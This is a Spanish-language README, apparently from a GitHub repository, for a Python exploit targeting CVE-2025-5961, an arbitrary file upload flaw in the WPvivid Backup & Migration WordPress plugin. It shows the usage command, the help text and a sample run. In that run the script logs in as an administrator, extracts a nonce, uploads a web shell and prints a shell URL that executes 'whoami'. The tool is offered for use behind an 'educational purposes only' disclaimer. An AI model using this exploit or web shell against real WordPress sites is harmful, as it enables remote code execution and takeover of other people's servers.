
Migración, Copia de Seguridad, Preparación – WPvivid Backup & Migration <= 0.9.116 - Autenticado (Administrador+) Subida Arbitraria de Archivos
📈 Esta vulnerabilidad afecta a un plugin con más de 700,000+ instalaciones
El plugin Migration, Backup, Staging – WPvivid Backup & Migration para WordPress es vulnerable a cargas arbitrarias de archivos debido a la falta de validación del tipo de archivo en la función wpvivid_upload_import_files en todas las versiones hasta la 0.9.116 inclusive.
Esto permite a atacantes autenticados (nivel de Administrador y superior) subir archivos arbitrarios al servidor, potencialmente permitiendo la ejecución remota de código.
Este repositorio contiene un script de exploit para CVE-2025-5961, escrito en Python, que:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
Este script se proporciona solo con fines educativos y de investigación.
El autor no se hace responsable de ningún uso indebido o daño causado por esta herramienta.
Khaled Alenazi (Nxploited)
🌐 GitHub